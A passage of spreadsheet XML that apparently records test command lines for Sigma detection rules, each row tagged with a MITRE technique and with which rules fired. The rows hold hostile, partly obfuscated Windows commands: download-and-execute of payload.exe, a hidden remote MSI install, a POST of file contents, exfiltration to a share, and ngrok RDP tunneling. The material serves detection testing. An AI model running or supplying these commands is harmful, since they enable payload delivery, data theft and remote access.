      </c>
      <c r="G679" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H679" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I679" s="43" t="n"/>
      <c r="J679" s="43" t="n"/>
      <c r="K679" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="680" ht="15.75" customHeight="1" s="42">
      <c r="A680" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B680" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C680" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D680" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E680" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F680" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G680" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I680" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J680" s="43" t="n"/>
      <c r="K680" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="681" ht="15.75" customHeight="1" s="42">
      <c r="A681" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B681" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C681" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D681" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E681" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -"W" Hidden -"C" "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u,'')"</t>
        </is>
      </c>
      <c r="F681" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I681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1" s="43" t="n"/>
      <c r="K681" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="682" ht="15.75" customHeight="1" s="42">
      <c r="A682" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B682" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C682" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D682" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E682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682" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I682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2" s="43" t="n"/>
      <c r="K682" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="683" ht="15.75" customHeight="1" s="42">
      <c r="A683" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B683" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C683" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D683" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E683" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -W Hidden -"C" "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u,'')"</t>
        </is>
      </c>
      <c r="F683" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I683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3" s="43" t="n"/>
      <c r="K683" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="684" ht="15.75" customHeight="1" s="42">
      <c r="A684" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B684" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C684" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D684" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E684" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe /"W" Hidden /"C" "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u,'')"</t>
        </is>
      </c>
      <c r="F684" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I684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4" s="43" t="n"/>
      <c r="K684" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="685" ht="15.75" customHeight="1" s="42">
      <c r="A685" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B685" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C685" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D685" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E685" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -W Hidden /"C" "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u,'')"</t>
        </is>
      </c>
      <c r="F685" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I685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5" s="43" t="n"/>
      <c r="K685" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="686" ht="15.75" customHeight="1" s="42">
      <c r="A686" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B686" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C686" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D686" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E686" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\temp\custom_host.exe &amp;&amp; C:\temp\custom_host.exe -"W" Hidden -C "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u,'')"</t>
        </is>
      </c>
      <c r="F686" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I686" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J686" s="43" t="n"/>
      <c r="K686" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="687" ht="15.75" customHeight="1" s="42">
      <c r="A687" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B687" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C687" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D687" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E687" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "svchost.exe --m^eshServiceName"</t>
        </is>
      </c>
      <c r="F687" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I687" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows (b471f462-eb0d-4832-be35-28d94bdb4780); Remote Access Tool - Potential MeshAgent Execution - Windows (2fbbe9ff-0afc-470b-bdc0-592198339968)</t>
        </is>
      </c>
      <c r="J687" s="43" t="n"/>
      <c r="K687" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="688" ht="15.75" customHeight="1" s="42">
      <c r="A688" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B688" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C688" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D688" s="43" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E688" s="43" t="inlineStr">
        <is>
          <t>powershell.exe  iwr -URI [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -Outfile C:\Users	haim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F688" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I688" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); PowerShell Script Run in AppData (ac175779-025a-4f12-98b0-acdaeb77ea85); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J688" s="43" t="n"/>
      <c r="K688" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="689" ht="15.75" customHeight="1" s="42">
      <c r="A689" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B689" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C689" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D689" s="43" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E689" s="43" t="inlineStr">
        <is>
          <t>powershell.exe iwr -Outfile C:\Users	haim\AppData\Local\Temp\Atomic-license.txt [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt)</t>
        </is>
      </c>
      <c r="F689" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I689" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); PowerShell Script Run in AppData (ac175779-025a-4f12-98b0-acdaeb77ea85); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J689" s="43" t="n"/>
      <c r="K689" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="690" ht="15.75" customHeight="1" s="42">
      <c r="A690" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B690" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_run</t>
        </is>
      </c>
      <c r="C690" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Execution</t>
        </is>
      </c>
      <c r="D690" s="43" t="inlineStr">
        <is>
          <t>9a019ffc-3580-4c9d-8d87-079f7e8d3fd4</t>
        </is>
      </c>
      <c r="E690" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set TUNNEL_TOKEN=eyJhbGci... &amp;&amp; cloudflared.exe tunnel run"</t>
        </is>
      </c>
      <c r="F690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I690" s="43" t="n"/>
      <c r="J690" s="43" t="n"/>
      <c r="K690" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="691" ht="15.75" customHeight="1" s="42">
      <c r="A691" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B691" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_file_download</t>
        </is>
      </c>
      <c r="C691" s="43" t="inlineStr">
        <is>
          <t>File Download with Headless Browser</t>
        </is>
      </c>
      <c r="D691" s="43" t="inlineStr">
        <is>
          <t>0e8cfe08-02c9-4815-a2f8-0d157b7ed33e</t>
        </is>
      </c>
      <c r="E691" s="43" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Windows\Temp\sysupdate.exe &amp; C:\Windows\Temp\sysupdate.exe --headless --dump-dom https://example.com/file.txt</t>
        </is>
      </c>
      <c r="F691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I691" s="43" t="n"/>
      <c r="J691" s="43" t="n"/>
      <c r="K691" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="692" ht="15.75" customHeight="1" s="42">
      <c r="A692" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B692" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C692" s="43" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D692" s="43" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E692" s="43" t="inlineStr">
        <is>
          <t>MpCmdRun.exe -DownloadFile -"url" [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -path C:\Users	haim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I692" s="43" t="n"/>
      <c r="J692" s="43" t="n"/>
      <c r="K692" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="693" ht="15.75" customHeight="1" s="42">
      <c r="A693" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B693" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C693" s="43" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D693" s="43" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E693" s="43" t="inlineStr">
        <is>
          <t>MpCmdRun.exe -"Download""File" -url [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -path C:\Users	haim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I693" s="43" t="n"/>
      <c r="J693" s="43" t="n"/>
      <c r="K693" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="694" ht="15.75" customHeight="1" s="42">
      <c r="A694" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B694" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli</t>
        </is>
      </c>
      <c r="C694" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - AnyDesk Piped Password Via CLI</t>
        </is>
      </c>
      <c r="D694" s="43" t="inlineStr">
        <is>
          <t>b1377339-fda6-477a-b455-ac0923f9ec2c</t>
        </is>
      </c>
      <c r="E694" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c"echo(J9kzQ2Y0qO|anydesk --set-password"</t>
        </is>
      </c>
      <c r="F694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I694" s="43" t="n"/>
      <c r="J694" s="43" t="n"/>
      <c r="K694" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="695" ht="15.75" customHeight="1" s="42">
      <c r="A695" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B695" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_qemu_suspicious_execution</t>
        </is>
      </c>
      <c r="C695" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Usage Of Qemu</t>
        </is>
      </c>
      <c r="D695" s="43" t="inlineStr">
        <is>
          <t>5fc297ae-25b6-488a-8f25-cc12ac29b744</t>
        </is>
      </c>
      <c r="E695" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "qemu-system-i386.exe -m 1M -netdev user,id=n1,restrict=off,connect=10.0.0.5:80 -nographic &amp; REM  -cdrom "</t>
        </is>
      </c>
      <c r="F695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I695" s="43" t="n"/>
      <c r="J695" s="43" t="n"/>
      <c r="K695" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="696" ht="15.75" customHeight="1" s="42">
      <c r="A696" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B696" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C696" s="43" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D696" s="43" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E696" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c t^yp^e C:\temp\data.txt &gt; \\webdav.server.local\share\data.txt</t>
        </is>
      </c>
      <c r="F696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I696" s="43" t="n"/>
      <c r="J696" s="43" t="n"/>
      <c r="K696" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="697" ht="15.75" customHeight="1" s="42">
      <c r="A697" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B697" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C697" s="43" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D697" s="43" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E697" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c type C:\temp\data.txt &gt;\\webdav.server.local\share\data.txt</t>
        </is>
      </c>
      <c r="F697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I697" s="43" t="n"/>
      <c r="J697" s="43" t="n"/>
      <c r="K697" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="698" ht="15.75" customHeight="1" s="42">
      <c r="A698" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B698" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C698" s="43" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D698" s="43" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E698" s="43" t="inlineStr">
        <is>
          <t>GUP.exe  -unzipTo  "" "C:\Temp" "Sample [https://getsamplefiles.com/download/zip/sample-2.zip](https://getsamplefiles.com/download/zip/sample-2.zip) CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6"</t>
        </is>
      </c>
      <c r="F698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I698" s="43" t="n"/>
      <c r="J698" s="43" t="n"/>
      <c r="K698" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="699" ht="15.75" customHeight="1" s="42">
      <c r="A699" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B699" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C699" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D699" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E699" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32
eplace.exe "C:\AtomicRedTeam\atomics\T1105\src
edcanary.cab" C:\Users	haim\AppData\Local\Temp "/A"</t>
        </is>
      </c>
      <c r="F699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I699" s="43" t="n"/>
      <c r="J699" s="43" t="n"/>
      <c r="K699" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="700" ht="15.75" customHeight="1" s="42">
      <c r="A700" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B700" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C700" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D700" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E700" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32
eplace.exe "C:\AtomicRedTeam\atomics\T1105\src
edcanary.cab" C:\Users	haim\AppData\Local\Temp /^A"</t>
        </is>
      </c>
      <c r="F700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I700" s="43" t="n"/>
      <c r="J700" s="43" t="n"/>
      <c r="K700" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="701" ht="15.75" customHeight="1" s="42">
      <c r="A701" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B701" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C701" s="43" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D701" s="43" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E701" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32
eplace.exe "C:\AtomicRedTeam\atomics\T1105\src
edcanary.cab" C:\Users	haim\AppData\Local\Temp  /A</t>
        </is>
      </c>
      <c r="F701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I701" s="43" t="n"/>
      <c r="J701" s="43" t="n"/>
      <c r="K701" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="702" ht="15.75" customHeight="1" s="42">
      <c r="A702" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B702" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C702" s="43" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D702" s="43" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E702" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$content = Get-Content C:\Windows\System32
otepad.exe
&amp; 'Invoke-WebRequest' -Uri [http://127.0.0.1](http://127.0.0.1) -Method POST -Body $content}</t>
        </is>
      </c>
      <c r="F702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I702" s="43" t="n"/>
      <c r="J702" s="43" t="n"/>
      <c r="K702" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="703" ht="15.75" customHeight="1" s="42">
      <c r="A703" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B703" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C703" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D703" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E703" s="43" t="inlineStr">
        <is>
          <t>ngrok.exe  tcp  3389</t>
        </is>
      </c>
      <c r="F703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I703" s="43" t="n"/>
      <c r="J703" s="43" t="n"/>
      <c r="K703" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="704" ht="15.75" customHeight="1" s="42">
      <c r="A704" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B704" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C704" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D704" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E704" s="43" t="inlineStr">
        <is>
          <t>ngrok.exe "tcp" 3389</t>
        </is>
      </c>
      <c r="F704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I704" s="43" t="n"/>
